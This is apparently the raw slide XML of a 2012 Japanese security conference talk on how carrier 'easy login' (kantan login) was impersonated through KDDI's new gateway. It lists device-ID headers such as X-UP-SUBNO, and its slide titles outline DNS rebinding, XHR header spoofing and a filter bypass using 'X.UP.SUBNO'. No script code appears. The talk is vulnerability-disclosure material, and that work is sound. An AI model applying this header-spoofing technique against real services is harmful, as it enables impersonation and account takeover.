        <p:nvSpPr>
          <p:cNvPr id="444503" name="Text Box 87"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5994123" y="1553933"/>
            <a:ext cx="3109942" cy="4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10000"/>
              </a:spcBef>
            </a:pPr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コンテンツ提供事業者</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="444504" name="Text Box 88"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3333957" y="1098953"/>
            <a:ext cx="2108886" cy="8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10000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2300" dirty="0">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:ea typeface="MS UI Gothic" pitchFamily="50" charset="-128"/>
              </a:rPr>
              <a:t>キャリア基地局ゲートウェイ</a:t>
            </a:r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 dirty="0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「かんたんログイン」とは</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="533506" name="Picture 2" descr="C:\HOME\SYNC\Project\MOBILE\imode-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583" y="761176"/>
            <a:ext cx="5882154" cy="307101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6914737" y="2290632"/>
            <a:ext cx="2352146" cy="71246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ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>端末固有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>のみをキーとして認証する</a:t>
            </a:r>
            <a:endParaRPr lang="ja-JP" altLang="en-US" sz="20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1620646" y="4262824"/>
          <a:ext cx="6720416" cy="244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580"/>
                <a:gridCol w="2810697"/>
                <a:gridCol w="2240139"/>
              </a:tblGrid>
              <a:tr h="40318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キャリア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名称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HTTP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>ヘッダ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</a:tr>
              <a:tr h="415450">
                <a:tc rowSpan="2"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NTT</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>ドコモ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FOMA</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>端末識別番号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User-Agent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</a:tr>
              <a:tr h="40318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i</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>モードＩＤ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X-DCMGUID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</a:tr>
              <a:tr h="403183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Au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EZ</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
                        <a:t>番号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X-UP-SUBNO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</a:tr>
              <a:tr h="40318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ソフトバンク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端末シリアル番号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User-Agent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</a:tr>
              <a:tr h="403183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ユーザーＩＤ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X-JPHONE-UID</a:t>
                      </a:r>
                      <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" sz="2000" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="100806" marR="100806" marT="50398" marB="50398"/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666108" y="3779838"/>
            <a:ext cx="6473689" cy="40712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ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>端末固有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" sz="2000" dirty="0" smtClean="0"/>
              <a:t>ID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ja-JP" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>あれこれ</a:t>
            </a:r>
            <a:endParaRPr lang="ja-JP" altLang="en-US" sz="2000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かんたんログイン画面の例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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="図 3" descr="hat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007" y="1200447"/>
            <a:ext cx="3561296" cy="5354770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="図 5" descr="mix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2961" y="1162349"/>
            <a:ext cx="3534519" cy="5354770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="フッター プレースホルダ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かんたんログイン画面の例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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="図 3" descr="tw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754" y="1203913"/>
            <a:ext cx="3552371" cy="5354770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="図 4" descr="rm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5373" y="1188228"/>
            <a:ext cx="3579147" cy="5354770"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="フッター プレースホルダ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かんたんログイン画面の例</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ja-JP" dirty="0" smtClean="0"/>
              <a:t>(3)</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="ja-JP" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="図 5" descr="mob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767" y="1229735"/>
            <a:ext cx="3590925" cy="5162550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="図 6" descr="livedo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987" y="1229735"/>
            <a:ext cx="3590925" cy="4762500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="フッター プレースホルダ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Copyright © 2008-2012 HASH Consulting Corp.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ja-JP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936EACF-5DE6-44CD-A549-37560DB1CAA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星 10 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="266700" y="3695701"/>
            <a:ext cx="4724400" cy="2137152"/>
          </a:xfrm>
          <a:prstGeom prst="star10">
            <a:avLst>
              <a:gd name="adj" fmla="val 34220"/>
              <a:gd name="hf" fmla="val 105146"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFD7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モバゲーは、トップページでかんたんログインずみ。</a:t>
            </a:r>
            <a:br>
              <a:rPr kumimoji="0" lang="ja-JP" alt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</a:br>
            <a:r>
              <a:rPr kumimoji="0" lang="ja-JP" alt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ログインボタンはない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HASH-C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HASH-C</Template>
  <TotalTime>0</TotalTime>
  <Words>1620</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>ユーザー設定</PresentationFormat>
  <Paragraphs>317</Paragraphs>
  <Slides>43</Slides>
  <Notes>43</Notes>
  <HiddenSlides>0</HiddenSlides>
  <MMClips>5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5" baseType="lpstr">
      <vt:lpstr>HASH-C</vt:lpstr>
      <vt:lpstr>ｸﾘｯﾌﾟ</vt:lpstr>
      <vt:lpstr>KDDI新GWの 「かんたんログイン」なりすまし問題を振り返る</vt:lpstr>
      <vt:lpstr>今日は、防御の話はしません</vt:lpstr>
      <vt:lpstr>話題は「かんたんログイン」攻撃方法</vt:lpstr>
      <vt:lpstr>完全に攻撃者観点</vt:lpstr>
      <vt:lpstr>ケータイWebアプリの構成</vt:lpstr>
      <vt:lpstr>「かんたんログイン」とは</vt:lpstr>
      <vt:lpstr>かんたんログイン画面の例(1)</vt:lpstr>
      <vt:lpstr>かんたんログイン画面の例(2)</vt:lpstr>
      <vt:lpstr>かんたんログイン画面の例(3)</vt:lpstr>
      <vt:lpstr>かんたんログインの標準的な実装</vt:lpstr>
      <vt:lpstr>今日の攻撃目標</vt:lpstr>
      <vt:lpstr>正常系Demo1</vt:lpstr>
      <vt:lpstr>正常系Demo2</vt:lpstr>
      <vt:lpstr>とくまるひろしの DNS Rebinding攻撃入門</vt:lpstr>
      <vt:lpstr>攻撃用スクリプト</vt:lpstr>
      <vt:lpstr>攻撃デモ（世界初公開*1）</vt:lpstr>
      <vt:lpstr>次の話題</vt:lpstr>
      <vt:lpstr>とくまるひろしの リクエストヘッダ書き換え攻撃入門</vt:lpstr>
      <vt:lpstr>話は、2011年6月にさかのぼる</vt:lpstr>
      <vt:lpstr>auの新GWの情報</vt:lpstr>
      <vt:lpstr>日記書いた(2011/6/15)</vt:lpstr>
      <vt:lpstr>EZブラウザはJavaScript非対応だが、PCSVはJavaScriptが使える</vt:lpstr>
      <vt:lpstr>XHRのsetRequestHeaderで、 User-AgentとX-UP-SUBNOを偽装できるのでは?</vt:lpstr>
      <vt:lpstr>だが、KDDIさんのことだから、そんなに単純な脆弱性はないだろう</vt:lpstr>
      <vt:lpstr>SSLを利用したリクエストヘッダ改変スクリプトの例</vt:lpstr>
      <vt:lpstr>アプリケーションが受け取ったリクエストの例（一部）</vt:lpstr>
      <vt:lpstr>この手が使えないか</vt:lpstr>
      <vt:lpstr>wktkして端末の発売を待つ</vt:lpstr>
      <vt:lpstr>IPアドレスの発表来た(2011/9/28)</vt:lpstr>
      <vt:lpstr>F001購入(2011/11/10)</vt:lpstr>
      <vt:lpstr>User_Agent、X_UP_SUBNOは ブロックされていた</vt:lpstr>
      <vt:lpstr>KDDIやるな…その日はあきらめて寝た</vt:lpstr>
      <vt:lpstr>翌早朝、海老原昂輔(@co3k)さんから、突破できた旨連絡をもらう</vt:lpstr>
      <vt:lpstr>X_UP_SUBNOではなく、X.UP.SUBNOだと突破可能</vt:lpstr>
      <vt:lpstr>こうなっていた</vt:lpstr>
      <vt:lpstr>攻撃スクリプトを作成</vt:lpstr>
      <vt:lpstr>Demo(PCSVからのかんたんログイン)</vt:lpstr>
      <vt:lpstr>Demo(攻撃)</vt:lpstr>
      <vt:lpstr>時系列のまとめ</vt:lpstr>
      <vt:lpstr>現状もEZブラウザとPCSVは別IPアドレス</vt:lpstr>
      <vt:lpstr>この問題はKDDI設備の脆弱性か?</vt:lpstr>
      <vt:lpstr>対策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2012-06-28T03:03:45Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2012-06-28T04:50:51Z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